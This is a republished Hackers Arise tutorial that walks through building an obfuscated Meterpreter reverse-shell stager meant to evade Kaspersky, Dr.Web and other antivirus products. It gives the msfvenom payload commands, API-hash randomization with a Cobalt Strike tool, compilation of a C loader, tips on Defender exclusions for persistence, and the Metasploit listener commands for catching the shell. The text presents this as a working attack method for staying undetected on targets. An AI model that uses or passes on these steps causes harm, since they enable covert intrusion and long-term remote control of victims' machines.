Welcome back warriors. It’s Overwatch here again. Today we’ll walk through one of the obfuscation methods we use during engagements. This time, we’re bypassing well-known Russian antivirus software like Kaspersky, DrWeb, and others that might be running on a typical system. This process is called evasion. The goal is to stay quiet, avoid detection, and […]
The post Malware Evasion – Evading Russian Antiviruses first appeared on Hackers Arise.
Welcome back warriors. It’s Overwatch here again. Today we’ll walk through one of the obfuscation methods we use during engagements. This time, we’re bypassing well-known Russian antivirus software like Kaspersky, DrWeb, and others that might be running on a typical system. This process is called evasion. The goal is to stay quiet, avoid detection, and keep control of your shell for as long as possible.
As you may know, there are ways to get a reverse shell through PowerShell or CMD using native Windows binaries. The issue is that antivirus software often monitors these methods. Even if it lets them through at first, the session usually gets killed shortly after. Instead, we’ll be using an obfuscated Meterpreter stager, which gives you full control of the system from socks and hash dumping to screenshots and everything else Meterpreter offers out of the box.
Generating a Stager
First, generate your stager using msfvenom. This is a standard step.
kali > msfvenom -p windows/meterpreter/reverse_tcp LHOST=
If your target is x64, use the correct payload for that architecture:kali > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=
Randomizing API Hashes
Next, remove known indicators of compromise (IoCs) from your stager. These are basically known patterns or strings AV tools look for. By replacing them with randomized data, you avoid basic signature-based detection.
Start by cloning the hash randomizer tool from GitHub:kali > git clone https://github.com/embee-research/Randomise-api-hashes-cobalt-strike
Run the tool against your stager. It will find and replace known IoCs with consistent but random values.
Copy the Payload
Once your payload is obfuscated, copy it to compile an executable. You’ll need xxd to convert it into a C-style array.
kali > xxd -i file.bin_0x69.bin
Crafting a Loader
Next, craft a simple loader in C. This loader will contain your obfuscated payload, so make sure to paste it correctly.
Compiling an Executable
Once the loader is ready, compile it using mingw-w64.
kali > x86_64-w64-mingw32-gcc loader.c -o loader.exe
Now you’ve got your executable. Time to test it.
Checking Detection
Upload the compiled loader to VirusTotal. The obfuscated payload should evade Kaspersky, Dr.Web, ESET, and Malwarebytes. These are among the more commonly deployed AV solutions in Russian environments.
Be aware: Microsoft Defender might still flag it. In some cases, adding .exe files to Defender exclusions will allow your payload to run without being stopped. If you’re in a situation where you control exclusions, this method works well for persistence.
To compare, upload a basic Meterpreter stager without hash randomization to VirusTotal. You’ll see a major difference in detection rates.
Delivery and Execution
Deliver your executable to the target machine using any method you prefer.
Set up a listener in Metasploit to catch the connection:
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST
msf6 > set LPORT
msf6 > run
Once the executable runs, you’ll get a Meterpreter session.
Conclusion
This method is quick, simple, and effective. It avoids traditional detection and doesn’t take much time to set up. Malware evasion can get a lot more advanced, especially when it involves C# and reverse engineering. But this technique is enough to stay off the radar in Russian environments and keep your access alive.
The post Malware Evasion – Evading Russian Antiviruses first appeared on Hackers Arise.
Source: HackersArise
Source Link: https://hackers-arise.com/malware-evasion-evading-russian-antiviruses/